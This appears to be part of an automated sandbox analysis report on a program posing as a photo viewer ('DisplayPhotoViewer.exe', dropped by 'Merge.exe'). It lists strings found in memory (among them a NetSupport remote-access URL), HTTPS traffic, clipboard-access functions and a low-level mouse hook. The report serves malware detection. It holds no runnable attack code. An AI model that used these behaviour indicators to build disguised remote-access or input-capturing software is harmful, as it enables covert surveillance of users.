DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951583851.000000000A742000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A75D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951725255.000000000A777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.nue.tu-berlin.de/forschung/projekte/lossless/mp4als.html#downloads
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.nue.tu-berlin.de/forschung/projekte/lossless/mp4als.html#downloads;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.on2.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.on2.com/vp7.php3
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.on2.com/vp7.php3;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.pbcore.org/PBCore/PBCoreNamespace.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.pbcore.org/PBCore/PBCoreXSD_Ver_1-2-1.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.pbcore.org/PBCore/PBCoreXSD_Ver_1-2-1.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.htm
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.pegasusimaging.com/cgi-bin/download2.cgi?LVIDB
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.pegasusimaging.com/cgi-bin/download2.cgi?LVIDB;;;RGB;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.playon.tv/playlater
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.q-team.de
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.q-team.de;;;
                                Source: Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drString found in binary or memory: http://www.r-wipe.comListBox
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.real.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.real.com;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.real.com;;;;;;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.real.com;HE-AAC
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.real.com;LC
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.sdcard.org/;SD
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.sega.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.sega.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-2/2013
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-2/2013http://www.smpte-ra.org/schemas/2067-2/XXXXhttp://www.smp
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-2/2016/PKL
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-2/XXXX
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-3/2013
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-3/2016
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-3/XXXX
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/429-7/2006/CPL
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/429-8/2007/PKL
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/429-9/2007/AM
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte.org/;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.sony.com/;Sony
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.sony.com/;Sony/Mobile
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.speex.org/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.speex.org/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.streambox.com/products/act-L2_codec.htm
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.streambox.com/products/act-L2_codec.htm;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.theora.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.theora.org
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.theora.org/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.twinvq.org/english/index_en.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vmware.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vmware.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vodei.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.volny.cz/aberka/czech/aqt.html;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vorbis.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vorbis.com/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vorbis.com;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vorbis.com;;Mode
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.voxware.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.wavpack.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.wavpack.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.wavpack.com/;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.webmproject.org/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.webmproject.org/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.webmproject.org;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.winnov.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.winnov.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.xvid.org/Downloads.15.0.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.xvid.org/Downloads.15.0.html;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://xml.apache.org/xalan
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://xmm.sourceforge.net/DivX5-6_Xvid_Bitstream_version.php
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://ad-id.org
                                Source: Merge.exe, 00000000.00000000.1850845816.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                                Source: Merge.exe, 00000000.00000000.1850845816.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                                Source: Merge.exe, 00000000.00000000.1850845816.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644381259.000000000B9CB000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644381259.000000000B9CB000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://developer.apple.com/library/content/documentation/MusicAudio/Reference/CAFSpec/CAF_overview/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/Vidvox/hap;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://matroska.org/downloads/windows.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mediaarea.net/mediainfoMiXmlGeneralOtherImageFormat_VersionVersion
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mediaarea.net/temp/baseMediaService-V1_1_0.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mediaarea.net/temp/baseMediaService-V1_2_0.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mediaarea.net/temp/baseMediaService-V1_3_0.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://raw.githubusercontent.com/WGBH/PBCore_2.1/master/pbcore-2.1.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://raw.githubusercontent.com/WGBH/PBCore_2.1/master/pbcore-2.1.xsdinstantiationIdentifierP2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://resolume.com/software/codec;;Version
                                Source: DisplayPhotoViewer.exeString found in binary or memory: https://secure.r-tt.com/UserConsole.shtml
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drString found in binary or memory: https://secure.r-tt.com/UserConsole.shtmlopen
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3625;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3097931052.0000000002A84000.00000004.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000000.2549778994.0000000001132000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.3delite.hu
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549778994.0000000001132000.00000002.00000001.01000000.00000005.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3107600843.0000000003F4E000.00000004.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3107600843.0000000003F84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.3delite.hu/D
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/DownloadSecondaryDisplayPhotoViewer.h
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549778994.0000000001132000.00000002.00000001.01000000.00000005.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3097931052.0000000002A06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/RegisterSecondaryDisplayPhotoViewer.h
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/SecondaryDisplayPhotoViewer.h
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3097931052.0000000002A3B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/SecondaryDisplayPhotoViewer.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549778994.0000000001132000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3097931052.0000000002A4B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlP
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3237762123.000000006B4D1000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlopen
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3237762123.000000006B4D1000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlopenU
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.3delite.hu/Secondary%20Display%20Photo%20Viewer/Privacy%20policy.txtopenU
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3097931052.0000000002A93000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.3delite.hu03
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3255940497.000000006C418000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.3delite.huD
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.blackmagicdesign.com/products/blackmagicraw;LT;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.blackmagicdesign.com/products/blackmagicraw;XQ;;
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drString found in binary or memory: https://www.r-wipe.com/#win-touchhttps://secure.r-tt.com/cgi-bin/Store?P=513mailto:sales
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://xiph.org/flac
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://xiph.org/flac/;Lossless
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1101DBD0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101DBD0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11031440 GetClipboardFormatNameA,SetClipboardData,6_2_11031440
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1101DBD0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101DBD0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110311C0 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,6_2_110311C0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110076A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,6_2_110076A0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: DirectInput8Creatememstr_725bb51b-d
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dllJump to behavior
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B1C4000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: GetRawInputDatamemstr_b2b7758b-4
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1110BC30 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,6_2_1110BC30
